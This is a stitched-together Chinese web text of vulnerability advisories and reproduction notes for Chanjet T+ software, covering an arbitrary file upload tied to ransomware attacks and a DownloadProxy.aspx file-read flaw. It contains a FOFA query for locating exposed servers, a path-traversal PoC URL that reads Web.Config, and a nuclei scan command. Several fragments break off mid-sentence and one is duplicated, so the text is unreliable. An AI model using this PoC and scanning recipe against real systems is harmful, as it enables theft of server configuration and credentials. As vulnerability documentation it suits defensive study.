一、漏洞描述2022年8月29日和8月30日,畅捷通公司紧急发布安全补丁修复了畅捷通T+软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞,通过绕过系统鉴权,在特定配置环境下实现任意文件的上传,从而执行任意代码,获得服务器控制权限。目前,已有用户被不法分子利用该漏洞进行勒索病毒攻击的情况出现。CNVD对该漏洞的综合评级为“高危”。二、影响范围漏洞影响的产品和版本:畅捷通T+单机版三、环境搭建https://dad.chanapp.chanjet.com/TplusYZHJ17.0.zip下载并解压文件进行环境检测开始检测检测通过安装选择标准版进行安装,安装时请关闭杀毒软件等待安装完成,过程中
漏洞描述2022年8月30日,国家信息安全漏洞共享平台(CNVD)收录了畅捷通T+软件任意文件上传漏洞(CNVD-2022-60632)。未经身份认证的攻击者可利用漏洞远程上传任意文件,获取服务器控制权限。目前,该漏洞已被发现利用进行勒索病毒攻击的情况,厂商已发布安全更新完成修复。建议受影响的单位和用户立即升级到最新版本影响范围漏洞影响的产品和版本:畅捷通T+单机版漏洞复现环境搭建解压后选择标准版安装过程中需要配置MSSQL数据库的。不设置即可安装成功漏洞测试根据网上流传的payload,进行代码审计(本文忽略),审计结果大概的意思为上传的文件不大于2M然后判断Content-Type是否为其
用友畅捷通T+DownloadProxy.aspx任意文件读取漏洞漏洞描述用友畅捷通T+DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件漏洞影响用友畅捷通T+FOFAapp="畅捷通-TPlus"漏洞复现登录页面验证POC/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config nuclei-pocsnuclei-t nuclei-tyonyou_changjietong_readfile_DownloadProxy.yaml-lurl.txt nuclei-poc
用友畅捷通T+DownloadProxy.aspx任意文件读取漏洞漏洞描述用友畅捷通T+DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件漏洞影响用友畅捷通T+FOFAapp="畅捷通-TPlus"漏洞复现登录页面验证POC/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config nuclei-pocsnuclei-t nuclei-tyonyou_changjietong_readfile_DownloadProxy.yaml-lurl.txt nuclei-poc